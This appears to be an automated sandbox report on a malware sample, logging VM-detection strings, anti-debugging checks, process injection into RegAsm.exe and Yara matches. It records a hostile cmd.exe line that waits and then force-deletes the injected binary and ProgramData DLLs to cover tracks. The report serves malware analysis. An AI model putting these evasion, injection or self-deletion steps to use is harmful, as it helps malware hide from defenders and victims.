Source: Amcache.hve.8.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1 |
Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.8.dr | Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware |
Source: Amcache.hve.8.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.8.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.8.dr | Binary or memory string: VMware PCI VMCI Bus Device |
Source: Amcache.hve.8.dr | Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.8.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: Amcache.hve.8.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_0041917C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 1_2_0041917C |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505E5D mov eax, dword ptr fs:[00000030h] | 0_2_00505E5D |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505CF9 mov eax, dword ptr fs:[00000030h] | 0_2_00505CF9 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505CB6 mov eax, dword ptr fs:[00000030h] | 0_2_00505CB6 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004FFD5B mov ecx, dword ptr fs:[00000030h] | 0_2_004FFD5B |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505D3C mov eax, dword ptr fs:[00000030h] | 0_2_00505D3C |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505D97 mov eax, dword ptr fs:[00000030h] | 0_2_00505D97 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505EE5 mov eax, dword ptr fs:[00000030h] | 0_2_00505EE5 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505EA1 mov eax, dword ptr fs:[00000030h] | 0_2_00505EA1 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00505F16 mov eax, dword ptr fs:[00000030h] | 0_2_00505F16 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_00415DB0 mov eax, dword ptr fs:[00000030h] | 1_2_00415DB0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8844 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_004C8844 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004D6B07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_004D6B07 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8CC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_004C8CC0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8E50 SetUnhandledExceptionFilter, | 0_2_004C8E50 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_00419DB7 SetUnhandledExceptionFilter, | 1_2_00419DB7 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 1_2_00417B3E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_004173CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_004173CD |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00E1018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, | 0_2_00E1018D |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41B000 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 636000 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E15008 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoEx,FormatMessageA, | 0_2_004A624D |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW, | 0_2_00512ADE |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00504C2D |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00512DE9 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00512D80 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00504D84 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00504DB9 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00504DBE |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: EnumSystemLocalesW, | 0_2_00512E84 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, | 0_2_00512F0F |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW, | 0_2_00513162 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 0_2_0051328B |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoEx, | 0_2_004C72A6 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW, | 0_2_00513391 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, | 0_2_00513460 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: GetLocaleInfoW, | 0_2_005056EB |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoA, | 1_2_00414560 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8B95 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 0_2_004C8B95 |
Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe |
Source: Amcache.hve.8.dr | Binary or memory string: msmpeng.exe |
Source: Amcache.hve.8.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe |
Source: Amcache.hve.8.dr | Binary or memory string: MsMpEng.exe |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 408, type: MEMORYSTR |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 408, type: MEMORYSTR |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.534b00.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.w7kdnBzGat.exe.4a0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |